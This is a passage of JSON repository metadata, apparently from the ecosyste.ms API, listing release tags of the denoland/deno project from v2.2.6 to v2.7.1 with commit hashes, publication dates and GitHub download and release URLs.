.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"